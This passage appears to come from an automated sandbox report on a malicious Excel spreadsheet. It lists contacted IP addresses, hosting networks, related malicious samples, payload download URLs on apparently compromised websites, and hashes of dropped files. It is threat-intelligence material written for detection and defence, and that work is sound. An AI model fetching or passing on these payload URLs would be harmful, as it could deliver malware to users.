                      http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://investor.msn.com/rundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmpfalse
                        high
                        http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2135422495.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129380276.0000000001E07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2121238818.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117336102.0000000001D17000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2135248089.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2129180884.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2120797082.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2117147505.0000000001B30000.00000002.00000001.sdmpfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          162.241.80.6
                          unknownUnited States
                          46606UNIFIEDLAYER-AS-1USfalse
                          138.36.237.100
                          unknownArgentina
                          27823DattateccomARfalse
                          68.66.216.42
                          unknownUnited States
                          55293A2HOSTINGUSfalse
                          72.52.227.180
                          unknownUnited States
                          32244LIQUIDWEBUSfalse

                          General Information

                          Joe Sandbox Version:31.0.0 Emerald
                          Analysis ID:357282
                          Start date:24.02.2021
                          Start time:11:53:23
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 6m 17s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:SecuriteInfo.com.XF.AShadow.4960.21593.8307 (renamed file extension from 8307 to xls)
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:9
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal84.expl.evad.winXLS@11/13@6/4
                          EGA Information:Failed
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Found warning dialog
                          • Click Ok
                          • Found warning dialog
                          • Click Ok
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          Warnings:
                          • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                          • TCP Packets have been reduced to 100
                          • Excluded IPs from analysis (whitelisted): 91.199.212.52, 205.185.216.42, 205.185.216.10
                          • Excluded domains from analysis (whitelisted): crt.usertrust.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          No simulations
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          162.241.80.6Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • pathinanchilearthmovers.com/eznwcdhx/44250666589120400000.dat
                          Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • pathinanchilearthmovers.com/eznwcdhx/44250659496064800000.dat
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • pathinanchilearthmovers.com/eznwcdhx/44250601302777800000.dat
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • pathinanchilearthmovers.com/eznwcdhx/44250596245254600000.dat
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • pathinanchilearthmovers.com/eznwcdhx/44245960229745400000.dat
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • pathinanchilearthmovers.com/eznwcdhx/44245955293750000000.dat
                          138.36.237.100Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • jugueterialatorre.com.ar/xjzpfwc/44250666589120400000.dat
                          Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • jugueterialatorre.com.ar/xjzpfwc/44250659496064800000.dat
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • jugueterialatorre.com.ar/xjzpfwc/44250601302777800000.dat
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • jugueterialatorre.com.ar/xjzpfwc/44250596245254600000.dat
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • jugueterialatorre.com.ar/xjzpfwc/44245960229745400000.dat
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • jugueterialatorre.com.ar/xjzpfwc/44245955293750000000.dat
                          CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                          • jugueteriaelgato.com.ar/zsrrq/416212.jpg
                          CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                          • jugueteriaelgato.com.ar/zsrrq/416212.jpg
                          CompensationClaim-1245593270-02032021.xlsGet hashmaliciousBrowse
                          • loonytoys.com.ar/rqksqzjvcmv/416212.jpg
                          CompensationClaim-1245593270-02032021.xlsGet hashmaliciousBrowse
                          • loonytoys.com.ar/rqksqzjvcmv/416212.jpg
                          fp5H5ulYUE5566sbSLC2.xlsGet hashmaliciousBrowse
                          • loonytoys.com.ar/rqksqzjvcmv/416212.jpg
                          fp5H5ulYUE5566sbSLC2.xlsGet hashmaliciousBrowse
                          • loonytoys.com.ar/rqksqzjvcmv/416212.jpg
                          68.66.216.42Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • biblicalisraeltours.com/otmchxmxeg/44250659496064800000.dat
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • biblicalisraeltours.com/otmchxmxeg/44250596245254600000.dat
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • biblicalisraeltours.com/otmchxmxeg/44245960229745400000.dat
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • biblicalisraeltours.com/otmchxmxeg/44245955293750000000.dat
                          ac6e58332e379d0712d36c5c83985c42.xlsGet hashmaliciousBrowse
                          • biblicalisraeltours.com/ivqcapzu/987298.jpg
                          ac6e58332e379d0712d36c5c83985c42.xlsGet hashmaliciousBrowse
                          • biblicalisraeltours.com/ivqcapzu/987298.jpg
                          72.52.227.180Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • rzminc.com/fdzgprclatqo/44250666589120400000.dat
                          Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • rzminc.com/fdzgprclatqo/44250659496064800000.dat
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • rzminc.com/fdzgprclatqo/44250601302777800000.dat
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • rzminc.com/fdzgprclatqo/44250596245254600000.dat
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • rzminc.com/fdzgprclatqo/44245960229745400000.dat
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • rzminc.com/fdzgprclatqo/44245955293750000000.dat
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          biblicalisraeltours.comComplaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 68.66.216.42
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 68.66.216.42
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • 68.66.216.42
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • 68.66.216.42
                          ac6e58332e379d0712d36c5c83985c42.xlsGet hashmaliciousBrowse
                          • 68.66.216.42
                          ac6e58332e379d0712d36c5c83985c42.xlsGet hashmaliciousBrowse
                          • 68.66.216.42
                          crt.sectigo.comComplaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 91.199.212.52
                          Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 91.199.212.52
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 91.199.212.52
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 91.199.212.52
                          CorpReport.exeGet hashmaliciousBrowse
                          • 91.199.212.52
                          sys.dllGet hashmaliciousBrowse
                          • 91.199.212.52
                          CorpReport.exeGet hashmaliciousBrowse
                          • 91.199.212.52
                          CorpReport.exeGet hashmaliciousBrowse
                          • 91.199.212.52
                          ReportCorp.exeGet hashmaliciousBrowse
                          • 91.199.212.52
                          1S0a576pAR.exeGet hashmaliciousBrowse
                          • 91.199.212.52
                          NJx63jHebE.exeGet hashmaliciousBrowse
                          • 91.199.212.52
                          EmployeeComplaintReport.exeGet hashmaliciousBrowse
                          • 91.199.212.52
                          ct.dllGet hashmaliciousBrowse
                          • 91.199.212.52
                          CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                          • 91.199.212.52
                          CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                          • 91.199.212.52
                          documents.docGet hashmaliciousBrowse
                          • 91.199.212.52
                          ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.docGet hashmaliciousBrowse
                          • 91.199.212.52
                          N.11389944 BS 05 gen 2021.docGet hashmaliciousBrowse
                          • 91.199.212.52
                          PSX7103491.docGet hashmaliciousBrowse
                          • 91.199.212.52
                          Beauftragung.docGet hashmaliciousBrowse
                          • 91.199.212.52
                          rzminc.comComplaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 72.52.227.180
                          Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 72.52.227.180
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 72.52.227.180
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 72.52.227.180
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • 72.52.227.180
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • 72.52.227.180
                          jugueterialatorre.com.arComplaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          pathinanchilearthmovers.comComplaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 162.241.80.6
                          Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 162.241.80.6
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 162.241.80.6
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 162.241.80.6
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • 162.241.80.6
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • 162.241.80.6
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          DattateccomARzJsbHB4YyL.docGet hashmaliciousBrowse
                          • 200.58.110.56
                          Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          swift copy pdf.exeGet hashmaliciousBrowse
                          • 200.58.111.74
                          Purchase Order _pdf.exeGet hashmaliciousBrowse
                          • 200.58.111.74
                          Purchase Order _pdf.exeGet hashmaliciousBrowse
                          • 200.58.111.74
                          CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          CompensationClaim-1245593270-02032021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          CompensationClaim-1245593270-02032021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          fp5H5ulYUE5566sbSLC2.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          fp5H5ulYUE5566sbSLC2.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          Payment Advice.xlsxGet hashmaliciousBrowse
                          • 66.97.33.176
                          Meezan Bank Payment.xlsxGet hashmaliciousBrowse
                          • 179.43.117.150
                          Walmart Order.xlsxGet hashmaliciousBrowse
                          • 179.43.117.150
                          INQUIRY-NOV-ORDER.xlsGet hashmaliciousBrowse
                          • 179.43.114.162
                          UNIFIEDLAYER-AS-1USQuotations.xlsxGet hashmaliciousBrowse
                          • 50.87.253.95
                          orden de compra xls.exeGet hashmaliciousBrowse
                          • 192.185.100.181
                          3zutY8IPBS.exeGet hashmaliciousBrowse
                          • 192.185.113.223
                          Attachment_78216.xlsbGet hashmaliciousBrowse
                          • 192.254.183.124
                          00113221.xlsxGet hashmaliciousBrowse
                          • 74.220.199.6
                          Outstanding Payment.exeGet hashmaliciousBrowse
                          • 108.179.232.42
                          vB1Zux02Zf.exeGet hashmaliciousBrowse
                          • 162.241.217.138
                          MV9tCJw8Xr.exeGet hashmaliciousBrowse
                          • 198.20.228.9
                          Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 162.241.80.6
                          Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 162.241.80.6
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 162.241.80.6
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 162.241.80.6
                          Payment Transfer Copy of $274,876.00 for the invoice shipments.exeGet hashmaliciousBrowse
                          • 50.116.112.43
                          ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                          • 50.87.196.120
                          PO-A2174679-06.exeGet hashmaliciousBrowse
                          • 192.185.78.145
                          22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                          • 108.167.156.42
                          CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                          • 192.185.181.49
                          PO.exeGet hashmaliciousBrowse
                          • 192.185.0.218
                          Complaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                          • 192.185.16.95
                          ESCANEAR_FACTURA-20794564552_docx.exeGet hashmaliciousBrowse
                          • 162.214.158.75
                          A2HOSTINGUSComplaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 68.66.216.42
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 68.66.216.42
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • 68.66.216.42
                          SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                          • 68.66.216.42
                          Statement_of_Account_as_of 02_17_2021.xlsmGet hashmaliciousBrowse
                          • 68.66.248.35
                          Statement_of_Account_as_of 02_17_2021.xlsmGet hashmaliciousBrowse
                          • 68.66.248.35
                          Claim-121548989-02162021.xlsGet hashmaliciousBrowse
                          • 68.66.226.85
                          ProtectedAdviceSlip.xlsGet hashmaliciousBrowse
                          • 70.32.23.16
                          v1K1JNtCgt.exeGet hashmaliciousBrowse
                          • 209.124.66.12
                          CompensationClaim-1625519734-02022021.xlsGet hashmaliciousBrowse
                          • 185.148.129.158
                          CompensationClaim-1625519734-02022021.xlsGet hashmaliciousBrowse
                          • 185.148.129.158
                          CompensationClaim-1828072340-02022021.xlsGet hashmaliciousBrowse
                          • 185.148.129.158
                          CompensationClaim-1828072340-02022021.xlsGet hashmaliciousBrowse
                          • 185.148.129.158
                          ac6e58332e379d0712d36c5c83985c42.xlsGet hashmaliciousBrowse
                          • 185.148.129.158
                          ac6e58332e379d0712d36c5c83985c42.xlsGet hashmaliciousBrowse
                          • 185.148.129.158
                          CompensationClaim-1378529713-02022021.xlsGet hashmaliciousBrowse
                          • 185.148.129.158
                          CompensationClaim-1378529713-02022021.xlsGet hashmaliciousBrowse
                          • 185.148.129.158
                          v22Pc0qA.doc.docGet hashmaliciousBrowse
                          • 70.32.23.44
                          2wUaqWdy.doc.docGet hashmaliciousBrowse
                          • 70.32.23.44
                          A3kAp3uzpg.xlsmGet hashmaliciousBrowse
                          • 85.187.128.19
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          7dcce5b76c8b17472d024758970a406bdocument-350252698.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          Document14371.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          Complaint_Letter_1186814227-02192021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          mexhlc.xlsxGet hashmaliciousBrowse
                          • 138.36.237.100
                          document-550193913.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          document-1915351743.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          SecuriteInfo.com.Heur.15528.xlsGet hashmaliciousBrowse
                          • 138.36.237.100
                          Subconract 504.xlsmGet hashmaliciousBrowse
                          • 138.36.237.100
                          upbck.xlsxGet hashmaliciousBrowse
                          • 138.36.237.100
                          IMG_6078_SCANNED.docGet hashmaliciousBrowse
                          • 138.36.237.100
                          RFQ Manual Supersucker en Espaol.xlsxGet hashmaliciousBrowse
                          • 138.36.237.100
                          _a6590.docxGet hashmaliciousBrowse
                          • 138.36.237.100
                          Small Charities.xlsxGet hashmaliciousBrowse
                          • 138.36.237.100
                          quotation10204168.dox.xlsxGet hashmaliciousBrowse
                          • 138.36.237.100
                          notice of arrival.xlsxGet hashmaliciousBrowse
                          • 138.36.237.100
                          22-2-2021 .xlsxGet hashmaliciousBrowse
                          • 138.36.237.100
                          Shipping_Document.xlsxGet hashmaliciousBrowse
                          • 138.36.237.100
                          Remittance copy.xlsxGet hashmaliciousBrowse
                          • 138.36.237.100
                          No context
                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30D802E0E248FEE17AAF4A62594CC75A
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):1559
                          Entropy (8bit):7.399832861783252
                          Encrypted:false
                          SSDEEP:48:B4wgi+96jf8TXJgnXpxi4sVtcTtrdoh+S:KiIq0eZnep
                          MD5:ADAB5C4DF031FB9299F71ADA7E18F613
                          SHA1:33E4E80807204C2B6182A3A14B591ACD25B5F0DB
                          SHA-256:7FA4FF68EC04A99D7528D5085F94907F4D1DD1C5381BACDC832ED5C960214676
                          SHA-512:983B974E459A46EB7A3C8850EC90CC16D3B6D4A1505A5BCDD710C236BAF5AADC58424B192E34A147732E9D436C9FC04D896D8A7700FF349252A57514F588C6A1
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview: 0...0..........}[Q&.v...t...S..0...*.H........0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0...181102000000Z..301231235959Z0..1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Sectigo Limited1705..U....Sectigo RSA Domain Validation Secure Server CA0.."0...*.H.............0.........s3..< ....E..>..?.A.20.l.......-?.M......b..Hy...N..2%.....P?.L.@*.9.....2A.&.#z. ... .<.Do.u..@.2.....#>...o]Q.j.i.O.ri..Lm.....~......7x...4.V.X....d[.7..(h.V...\......$..0......z...B......J.....@..o.BJd..0.....'Z..X......c.oV...`4.t........_.........n0..j0...U.#..0...Sy.Z.+J.T.......f.0...U........^.T...w.......a.0...U...........0...U.......0.......0...U.%..0...+.........+.......0...U. ..0.0...U. .0...g.....0P..U...I0G0E.C.A.?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v..+........j0h0?..+.....0..3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%..+.....0.
                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                          Category:dropped
                          Size (bytes):59134
                          Entropy (8bit):7.995450161616763
                          Encrypted:true
                          SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                          MD5:E92176B0889CC1BB97114BEB2F3C1728
                          SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                          SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                          SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0968A1E3A40D2582E7FD463BAEB59CD
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):1413
                          Entropy (8bit):7.480496427934893
                          Encrypted:false
                          SSDEEP:24:yYvJm3RW857Ij3kTteTuQRFjGgZLE5XBy9+JYSE19rVAVsGnyI3SKB7:PL854TTuQL/ZoXQ9+mrGVrb3R
                          MD5:285EC909C4AB0D2D57F5086B225799AA
                          SHA1:D89E3BD43D5D909B47A18977AA9D5CE36CEE184C
                          SHA-256:68B9C761219A5B1F0131784474665DB61BBDB109E00F05CA9F74244EE5F5F52B
                          SHA-512:4CF305B95F94C7A9504C53C7F2DC8068E647A326D95976B7F4D80433B2284506FC5E3BB9A80A4E9A9889540BBF92908DD39EE4EB25F2566FE9AB37B4DC9A7C09
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview: 0...0..i.......9rD:.".Q..l..15.0...*.H........0{1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Comodo CA Limited1!0...U....AAA Certificate Services0...190312000000Z..281231235959Z0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0.."0...*.H.............0..........e.6......W.v..'.L.P.a. M.-d.....=.........{7(.+G.9.:.._..}..cB.v.;+...o... ..>..t.....bd......j."<......{......Q..gF.Q..T?.3.~l......Q.5..f.rg.!f..x..P:.....L....5.WZ....=.,..T....:M.L..\... =.."4.~;hf.D..NFS.3`...S7.sC.2.S...tNi.k.`.......2..;Qx.g..=V...i....%&k3m.nG.sC.~..f.)|2.cU.....T0....}7..]:l5\.A...I......b..f.%....?.9......L.|.k..^...g.....[..L..[...s.#;-..5Ut.I.IX...6.Q...&}.M....C&.A_@.DD...W..P.WT.>.tc/.Pe..XB.C.L..%GY.....&FJP...x..g...W...c..b.._U..\.(..%9..+..L...?.R.../..........0..0...U.#..0......#>.....)...0..0...U......Sy.Z.+J.T.......f.0...U...........0...U.......0....0...U
                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30D802E0E248FEE17AAF4A62594CC75A
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):282
                          Entropy (8bit):3.129725157113391
                          Encrypted:false
                          SSDEEP:3:kkFklHhOR9llXfllXlE/lPbXx8bqlF8tlije9DZl2i9XYolzlIlMltuN7ANJbZ1N:kKxR9llqjXxp9jKFlIaYM2+/LOjA/
                          MD5:5959AC649656458494BAB1F86BEB3DB1
                          SHA1:30A80439CDB3DDFAB9BFB433E0E47B957E046B3C
                          SHA-256:C8F0EA3ED5E82F77EB870EAAA5E4E02FBD49B59F1A32DB38A0D4B39E01F3AF0D
                          SHA-512:23B660C8CA426D37A555E9793751FB2910A3080DB0C86C6FD4DAB8DB7FB624EC9B1685169CC857AED974ABA70FFD70CF14BF03EA90DDFBA64E0CDD22A6B5BAB5
                          Malicious:false
                          Reputation:low
                          Preview: p...... ........2D......(....................................................... ........@u.>r..@8..................h.t.t.p.:././.c.r.t...s.e.c.t.i.g.o...c.o.m./.S.e.c.t.i.g.o.R.S.A.D.o.m.a.i.n.V.a.l.i.d.a.t.i.o.n.S.e.c.u.r.e.S.e.r.v.e.r.C.A...c.r.t...".5.b.d.b.9.3.8.0.-.6.1.7."...
                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):328
                          Entropy (8bit):3.0786571245093444
                          Encrypted:false
                          SSDEEP:6:kKepbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:Ww3kPlE99SNxAhUeo+aKt
                          MD5:C471F3E3546ABE9A156D79E7B2031F81
                          SHA1:BB0FB1A17A9DA6F54AD54925A62BB6BE5CA5CBE2
                          SHA-256:99F56F67D6CDCD1E3323B4B9B839F4E217D9D97393D14DACC1D802B6732ECCA5
                          SHA-512:E1985C606579C3ADCE8A9EC0CCFD315C280FF7DA3B7CD00E4A430DFAD30E9218B32F96B75E6A70DFA2ACCB4E677A54CEFD21CBDA8E4EACA110A35165FB7A109A
                          Malicious:false
                          Preview: p...... ..........'.....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0968A1E3A40D2582E7FD463BAEB59CD
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):250
                          Entropy (8bit):2.969287375524799
                          Encrypted:false
                          SSDEEP:3:kkFklNlAlDqMlXfllXlE/lQcjT18tlwiANjpU+plgh3VEkax3QbaLU15lqErtd9o:kKFleMlqQAbjMulgokaWbLOW+n
                          MD5:8422257CB589C7117C98EB66825EABE5
                          SHA1:E8589CAADAC4C2755A76C24D1C16F55E38AA7DFE
                          SHA-256:62EF633B1F4306B5370DA5DA8FFFA13ED0AE505BCEB35DB1124694017CF05646
                          SHA-512:1E218CA0DCEAC7A141E208C18646CE7EAC7855B30F64B0FBC579DF9990F917E1FCCBAA000A64F8168B66E46DCD8CC15206247191244D80EBE41717E9A187ABCC
                          Malicious:false
